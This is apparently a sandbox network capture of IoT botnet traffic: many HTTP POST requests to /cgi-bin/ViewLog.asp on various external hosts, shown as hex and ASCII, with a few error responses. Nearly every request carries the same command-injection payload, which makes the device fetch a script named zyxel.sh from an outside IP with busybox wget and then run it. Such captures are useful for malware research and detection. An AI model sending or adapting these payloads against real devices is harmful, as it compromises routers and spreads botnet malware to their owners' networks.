                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:03.610373020 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:30:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            916192.168.2.234444631.136.118.1908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.541512012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.209990978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.553765059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.433378935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.808610916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.559238911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:46.060302019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            917192.168.2.235996694.80.33.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.541590929 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            918192.168.2.233534285.81.62.2168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.541635036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:03.766102076 CET513INHTTP/1.1 503 Service Unavailable
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:30:03 GMT
                                                            Connection: close
                                                            Content-Length: 326
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            919192.168.2.235440831.136.135.1658080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.541697025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.209990978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.553765059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.433378935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.808610916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.559205055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:46.060302019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            920192.168.2.233325094.63.246.178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.545000076 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            921192.168.2.236060294.122.222.1718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.555361986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            922192.168.2.233605631.200.52.2428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.563745975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            923192.168.2.235400462.29.102.1858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.803381920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            924192.168.2.236000031.136.5.968080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.947690964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.561924934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:05.809726000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:08.433389902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.553358078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:23.535552025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.012592077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            925192.168.2.235103031.136.21.2308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:03.983498096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:04.657908916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
